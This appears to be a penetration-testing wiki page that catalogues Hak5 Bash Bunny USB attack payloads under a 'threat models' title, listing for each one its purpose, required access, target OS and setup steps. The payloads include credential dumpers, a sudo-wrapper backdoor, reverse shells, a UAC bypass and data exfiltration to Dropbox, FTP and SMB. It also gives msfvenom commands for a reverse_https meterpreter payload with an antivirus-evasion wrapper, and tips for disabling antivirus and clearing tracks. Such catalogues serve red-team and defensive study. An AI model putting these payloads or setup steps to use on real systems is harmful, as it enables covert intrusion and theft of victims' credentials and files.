# BashBunny Threat models

## Payloads

> All the payloads can be found here:

{% embed url="https://github.com/hak5/bashbunny-payloads" %}

Here I will cover all the payloads and their threat models.

## Hidden Images

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/Incident\_Response/Hidden\_Images" %}

> This payload will look for files that don't have an image file extension but have image headers in their contents. This is to discover images that have been hidden by changing the file extension.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> The output is put into a CSV file in the folder `\loot\image-files`.

### Requirements

* Powershell

## Link File Analysis

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/Incident\_Response/Link\_File\_analysis" %}

> This payload will look for links that are pointing to a drive other than the C:\ drive.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> The output is put into a CSV file in the folder `\loot\link-files`.

### Requirements

* Powershell

## Meterpreter shell on an Amazon Fire TV

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/android/fireytv" %}

> This payload enables ADB and Unknown sources via keyboard input on the target Fire TV, then uses ADB to go ahead and install payload.apk from the switch directory and then execute it.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [x] None
  * [ ] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [ ] Mac
* [x] Android

### Output

> This will generate a meterpreter shell.

### Requirements

* android-tools-adb
* Create a payload APK file and place it in the same directory as payload.txt, plug in and wait.

## Android open url

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/android/open\_url" %}

> This payload opens the browser to a specified url on an unlocked android phone.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [ ] Mac
* [x] Android

### Output

> This will open an URL on the victims phone

### Requirements

* Set target URL in payload.txt

## BruteBunny

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/BruteBunny" %}

> This payload will brute-force the credentials to the router via 2 word-lists.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store credentials in `/loot/log.txt`

### Requirements

* Modify the variables in brutebunny.ps1 to change the default IP/Port for this attack. Feel free to use your own wordlists as well; however you will need to adjust some of the sleep times accordingly depending on the length of time your list will take to go through.

## BunnyTap

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/BunnyTap" %}

> This payload is based on PoisonTap created by [@SamyKamkar](https://twitter.com/samykamkar) \|\| [https://samy.pl](https://samy.pl/)

#### When plugged into a **locked/password protected** computer, it:

* emulates an Ethernet device over USB \(or Thunderbolt\)
* hijacks **all Internet traffic** from the machine \(_despite_ being a low priority/unknown network interface\)
* siphons and stores HTTP cookies and sessions from the web browser for the Alexa top 1,000,000 websites
* exposes the **internal router** to the attacker, making it accessible **remotely** via outbound WebSocket and DNS rebinding \(thanks [Matt Austin](https://maustin.net/) for rebinding idea!\)
* installs a persistent web-based backdoor in HTTP cache for hundreds of thousands of domains and common Javascript CDN URLs, all with access to the user’s cookies via cache poisoning
* allows attacker to **remotely** force the user to make HTTP requests and proxy back responses \(GET & POSTs\) with the **user’s cookies** on any backdoored domain
* does **not** require the machine to be unlocked
* backdoors and remote access persist **even after device is removed** and attacker sashays away

#### PoisonTap evades the following security mechanisms:

* [Password Protected Lock Screens](https://www.wikiwand.com/en/Lock_screen)
* [Routing Table](https://www.wikiwand.com/en/Routing_table) priority and network interface Service Order
* [Same-Origin Policy](https://www.wikiwand.com/en/Same-origin_policy)
* [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options)
* [HttpOnly](https://www.owasp.org/index.php/HttpOnly) Cookies
* [SameSite](https://www.chromestatus.com/feature/4672634709082112) cookie attribute
* [Two-Factor/Multi-Factor Authentication](https://www.wikiwand.com/en/Multi-factor_authentication) \(2FA/MFA\)
* [DNS Pinning](https://www.wikiwand.com/en/DNS_rebinding)
* [Cross-Origin Resource Sharing \(CORS\)](https://www.wikiwand.com/en/Cross-origin_resource_sharing)
* [HTTPS cookie protection](https://www.wikiwand.com/en/HTTPS) when [Secure](https://www.owasp.org/index.php/SecureFlag) cookie flag & [HSTS](https://www.wikiwand.com/en/HTTP_Strict_Transport_Security) not enabled

{% embed url="https://samy.pl/poisontap/" %}

{% embed url="https://www.youtube.com/watch?v=Aatp5gCskvk&feature=youtu.be" %}

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [x] None
  * [ ] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Configured for Windows by default. Swap RNDIS\_ETHERNET for ECM\_ETHERNET on Mac/\*nix
* dnsspoof must be installed \(use install.sh\)

## BunnyHound

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/Bunnyhound" %}

> Sets up Ethernet and HID keyboard interfaces simultaneously, then uses HID to import Sharphound into memory via Bash Bunny web server and execute the attack. Results are exported to the loot directory via SMB.

{% hint style="info" %}
Note: This module will bypass network restrictions on USB disk drives as only a network card and keyboard are emulated.
{% endhint %}

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Impacket and gohttp should be installed

## DumpCreds

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds" %}

{% hint style="danger" %}
Works only on Bash Bunny with FW 1.1
{% endhint %}

{% hint style="warning" %}
* If you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded.
* If the payload doesnt work. \(Red LED or Yellow LED blinks 2 or 4 times\) plug off the BB and try it once more \(can take 3 or 4 times\)
* If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out. If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. \(Thats a FW 1.1 issue\)
{% endhint %}

> Dumps the usernames & plaintext passwords from
>
> * Browsers \(Crome, IE, FireFox\)
> * Wifi
> * SAM Hashes \(only if AdminMode=True\)
> * Mimimk@tz Dump \(only if AdminMode=True\)
> * Computerinformation \(Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist\)
>
> without
>
> * Use of USB Storage \(Because USB Storage ist mostly blocked by USBGuard or DriveLock\)
> * Internet connection \(becaus Firewall ContentFilter Blocks the download sites\)

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/DumpCred_2.1/`

### Requirements

#### Download

{% embed url="https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds\_2.0" %}

#### Install

1. Put Bash Bunny in arming mode
2. Copy All Folders into the root of Bunny Flash Drive Mandatory \* payloads/library/DumpCreds\_2.1 --&gt; the payload Files \* payloads/library/DumpCreds\_2.1/PS --&gt; the Powershell scripts for the payload \* tools --&gt; impacket tools \(provide the smbserver.py\) \(not neccessary if you had already installed\) Not neccessary \* docs --&gt; this doc file \* languages --&gt; languauge files for DUCKY\_LANG
3. eject Bash Bunny safely!!
4. Insert Bash Bunny in arming mode \( Impacket and languages will be installed \)
5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds\_2.1 to payloads/switch1 or payloads/switch2
6. eject Bash Bunny safely
7. move switch in right position
8. plugin Bash Bunny and have fun....! :-\)

## Password Grabber

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber" %}

> Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
>
> Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> The output is put into the folder `\loot\`.

### Requirements

1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases).
2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe
3. Plug your BashBunny and Enjoy

{% hint style="info" %}
Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
{% endhint %}

## QuickCreds

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/QuickCreds" %}

> Snags credentials from locked or unlocked machines Based on the attack by Mubix of Room362.com Implements a responder attack. Saves creds to the loot folder on the USB Disk Looks for _NTLM_ log files

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [x] None
  * [ ] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> The output is put into the folder `\loot\`.

### Requirements

* Configured for Windows by default. Swap RNDIS\_ETHERNET for ECM\_ETHERNET on Mac/\*nix
* Responder must be in `/tools/responder/`

## Quickdraw

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/Quickdraw" %}

> Sets up Ethernet and HID keyboard interfaces simultaneously, runs Responder, then uses HID to generate an NTLMv2 hash response from the target computer.

{% hint style="info" %}
Note: This module will bypass network restrictions on USB disk drives as only a network card and keyboard are emulated.
{% endhint %}

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store credentials in `/loot/`

### Requirements

* Responder should be installed.

## Roaster

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/Roaster" %}

> Sets up Ethernet and HID keyboard interfaces simultaneously, then uses HID to import Invoke-Kerberoast into memory via Bash Bunny web server and execute the attack. Results are exported to the loot directory via SMB.

{% hint style="info" %}
Note: This module will bypass network restrictions on USB disk drives as only a network card and keyboard are emulated.
{% endhint %}

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Impacket and gohttp should be installed

## SudoBackdoor

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor" %}

> Injector: Inject a sudo backdoor by installing a wrapper inside .config/sudo/ and sourcing the dir in the $PATH. Cleaner: Get back the password grabbed by the sudo backdoor and do cleanup.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode.

## WiPassDump

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/WiPassDump" %}

> Dumps saved Wi-Fi infos including clear text passwords to the bash bunny Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## WifiGrabber

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/WifiGrabber" %}

> This is a simple Wifi password grabber tested and working for Windows 7 However this has not been tested on Windows 8 and above and any suggestions and improvements are greatly welcomed. Powershell scripting isn't higest skill so I'm sure I'll have much to learn from sharing this code with everyone. :\)

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## WifiPass

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/WifiPass" %}

> A bit of a fork from WiFiCreds, this uses the same Powershell attack to get wifi networks and their passwords.
>
> WifiPass starts with getting the list of wireless networks saved on the device, storing those to a file. With a little bit of logic, it runs through the networks, only saving out networks that have a Key Content of anything besides 1 \(1 being used in the case of WEP and open networks\). _NOTE: this will give you network names of university/college networks that pass user accounts to log into them. They won't give you the password with this attack._
>
> It stores all those in a loot file with the name of the computer. Eject, sync, Ghostbusters reference, then you're good to go.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## WindowsCookies

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/WindowsCookies" %}

> Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines, now works on Windows 7 \(fixed powershell regex\) Only payload.txt, server.py and p are required. Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Bushing's Blue Turtle: The sudo subverter

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/bushingsBlueTurtle" %}

> Injector: Creates a folder called ~/.config/sudo where it puts a python wrapper for sudo and a meterpreter payload. Next, it copies over the python sudo wrapper and meterpreter payload. It then runs the initialization function in the wrapper script to set some environmental values like the actual path for sudo and the path for python. The initialization function also initializes a file for saving sudo creds and slightly alters the meterpreter payload so it will fail silently if there is a bad network connection or other exception. Finally, it will set a new value in the user's PATH so that they will be running this wrapper instead of actually doing sudo. The main abnormality a user should see is a slight delay in being asked to enter their password. After this wrapper runs the desired sudo command, it will use the captured password \(although probably not absolutely necessary at this stage\) to have sudo run the meterpreter payload. That should open up a meterpreter session on the listening computer with root on the target. True pwnage. Every time they sudo something. Cleaner: I will probably make a cleaner for this thing eventually for completeness sake... but really, why make a cleaner when this thing should give you multiple remote root shells?

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode. This payload has been tested on mac and linux. Works on both mac and linux. Mac was running sophos antivirus during the test and it blocked download of the reverse tcp shell. This can be fixed with the use of my shell smuggler \(see below for details\).

  **Crafting a meterpreter shell payload**

  Payloads should be crafted in msfvenom. The meterpreter shell will be the python reverse https meterpreter payload. The payload should be stored in the folder with the rest of the files for this bash bunny payload in a file called shell.py \(stored on the target system as .sudo in the directory we created\). The command for generating an appropriate meterpreter shell payload is below: `msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py`

  Note that _antivirus appears to pick up this reverse tcp payload_ really well. Annoying. shellSmuggler.py to the rescue! The best way to run this is to cd into the bashbunny itself and then into the payloads switch folder you are running from and run the following command \(plugging in your IP address and port\): `msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw | python ShellSmuggler.py > shell.py`

## Mac Info Grabber

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/macinfograbber" %}

> A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in the Documents folder and places them inside a folder on the BashBunny called MacLoot.
>
> This payload can be easily modified to grab other files like word docs or csv files.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## RAZ\_VBScript

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/execution/RAZ\_VBScript" %}

> Execute a .vbs script

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* a.vbs - VBScript to be executed in a hidden Powershell window

## RevShellBack

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/execution/RevShellBack" %}

> Set up a reverse shell and execute PowerShell/generic commands in the background from the Bash Bunny via USB ethernet.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Place powershell and/or generic commands between lines 53 and 58 \(within the EOF\). Need to run as admin? Set the variable ADMIN to true. Having issues obtaining a connection with the listener? Alter the time before connection attempt in NCDELAY.

## ShellExec

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/execution/ShellExec" %}

> Serves malicious scripts or web pages from the Bunny and forces victims to curl and execute those scripts. Scripts can also force browsers to open a url on the bunny to do things like serve BeEF hooks.
>
> Perfect for when mass storage isn't an option.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* evil.py - script that is fetched with DuckyScript \(provided script opens a web page that serves a BeEF hook \)
* hook.js - the aforementioned BeEF hook
* index.html - BeEF hook delivery page

## StickyBunny

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/execution/StickyBunny" %}

> Changes the sticky keys executeable to a CMD executatble allowing CMD to be opened at login page.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [ ] User
  * [x] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## UACBypass

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/execution/exe\_UACBypassD%26E" %}

> Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights \(aka UAC bypass/exploit\) Please define URL and SAVEFILENAME in the a.vbs script Target does need internet connection Works on Windows 7 - Windows 10 The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges However from what i am aware version 7,8 and 8.1 are still effected Currently fastest download and execute for HID attacks to date. \(with UAC bypass\)

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [ ] User
  * [x] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Target must be an Windows box with an working internet connection,powershell and vb script enabled \(enabled by default\) Please edit the a.vbs script with your binary payload URL and savename

## psh\_DownloadExec

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/execution/psh\_DownloadExec" %}

> Quick HID attack to retrieve and run powershell payload from BashBunny web server.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
* **gohttp**

  gohttp is a standalone simple webserver that is quicker and more stable than python's SimpleHTTPServer.

  **Installation**

  See Hak5's Tool Thread Here: [https://forums.hak5.org/index.php?/topic/40971-info-tools/](https://forums.hak5.org/index.php?/topic/40971-info-tools/)

## psh\_DownloadExecSMB

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/execution/psh\_DownloadExecSMB" %}

> Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
* Requires Impacket

**Installation**

See Hak5's Tool Thread Here: [https://forums.hak5.org/index.php?/topic/40971-info-tools/](https://forums.hak5.org/index.php?/topic/40971-info-tools/)

## BlackBackup

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/BlackBackup" %}

> Runs powershell script to get Wlan and logon credentials from computer and save them on USB drive \(Storage attack\)

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

**FileInfoExfil**

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/FileInfoExfil" %}

> Exfiltrate file information if they start with a specific passphrase, and once complete the Bunny should be ejected

{% hint style="info" %}
NOTE: The Bunny will only be ejected when it is not in use, so if the scan is still continuing it will fail to eject
{% endhint %}

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* p.ps1 file MUST be in /payloads folder.

## MacPDFExfil

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil" %}

> Mounts as storage and acts as HID. Backup PDF files to the BashBunny. Configured to copy all PDFs located in the users home directory to the BashBunnny. This can be edited in the script.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Powershell TCP extractor

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/Powershell\_TCP\_Extractor" %}

> Copies data to temp directory and uses powershell tcp socket to extract to a listener on remote machine

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* The payload copies target to %APPDATA%, change this to wherever you like by editing powershell script, it then zips data and sends data to listener on a remote machine, also specified in powershell script.

## sMacAndGrab

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/SmacAndGrab" %}

> Mounts as storage and acts as HID. Backup a list of files to the BashBunny

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Provide a newline-separated list of files you want to backup and wait for the green light. You can also provide `find` and `grep`commands as literal strings to pass to QUACK which get run on TARGET.

## Exfiltrate using SmartFileExtract Utility

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/SmartFileExtract\_Exfiltrator" %}

> SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but also is usable as a standalone utility. Files are found by standard patterns \(including wildcards\) and then copied to any valid path.
>
> Additional features:
>
> * Find by seeking keywords in any file.
> * Use “curtains” that show standard progress, no window, or stealthy windows that are either inconspicuous or look just like a regular install window.
> * Best of all, stop the copy after a specified time or amount in MBs has been copied - or even stop it manually. No longer worry about pulling the BashBunny while in mid-operation.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements



#### Where do I get it?

Download the SmartFileExtract utility from

[https://github.com/saintcrossbow/SmartFileExtract](https://github.com/saintcrossbow/SmartFileExtract)

You will only need the SmartFileExtract.exe from the project root.

#### So how does it work?

SmartFileExtract runs from the command line using three mandatory parameters: the file pattern to find \(/file\), the drives to seek \(/drive\), and where to copy the found files \(/copyto\).

There are additional options to make the extract stealthier. The SmartFileExtract documentation explains in detail, and you can also see options by typing `SmartFileExtract /help`

#### What is the payload setup to do?

I've included the script that I actually use, which works using IMcPwn's ExecutableInstaller:

* Options are in e.cmd file
* It finds all documents and any filename with the word “secret” or “pass” in it
* Found files are copied to loot directory
* It will kill the extract after 90 seconds or after 500 MBs are copied.

## **browserData**

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/browserData" %}

> Enumerates browser history or bookmarks for a Chrome, Internet Explorer, and/or Firefox browsers on Windows machines.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Dropbox Exfiltrator

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/dropbox-exfiltrator" %}

> Staged powershell payload which downloads and executes exfil.ps1 from dropbox which compresses the users documents folder and uploads it to dropbox.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Step 1. Create a Dropbox app using their API and generate an access token from [https://www.dropbox.com/developers/apps/create](https://www.dropbox.com/developers/apps/create)
* Step 2. Customize the powershell second stage exfil.ps1 file to exfiltrate the loot to Dropbox using the token generated above
* Step 3. Get a direct dropbox link for the powershell file \(right-click exfil.ps1, get dropbox link, replace dl=0 with dl=1\)
* Step 4. Customize the exfiltration payload.txt to use the dropbox link from above
* Step 5. ???
* Step 6. h4x

## FTP Exfiltrator

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/ftp\_exfiltrator" %}

> Exfiltrates files from the users Documents folder FTP's all files/folders to a specified FTP site named by the victim hostname. Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Edit 1.ps1 to specify FTP site, username and password

## **optical-exfiltration**

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/optical-exfiltration" %}

> Quick HID only attack to write an HTML/JS file to target machine and open a browser, to exfiltrate data Using QR Codes and a video recording device.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [x] Linux
* [ ] Mac
* [ ] Android

### Output

> Will generate qr code that needs to be recorded using video recording software or send it to your server.

### Requirements

* Optional html params:

  - base64: Passing a base64 string to this param will auto-start processing QR Codes.

  - playback: Passing the string "finish" to this param will auto-play the results, when QR codes finish rendering

## simple-usb-extractor

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/simple-usb-extractor" %}

> A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/simple-usb-file-extractor` folder. Also deletes the run-line history because why not.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/simple-usb-file-extractor/`

### Requirements

* By default the payload is set to pull all .pdf and .docx files from the Desktop, Downloads, and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.

## Faster SMB Exfiltrator

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/smb_exfiltrator" %}

> xfiltrates select files from users's documents folder via SMB. Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME.
> Rewrite of the original SMB Exfiltrator payload with:
>* Faster copying, using robocopy multithreaded mode
* Faster finish, using a EXFILTRATION_COMPLETE file
* Offload logic to target PC for accurate date/time
* Clears tracks by default without second run dialog
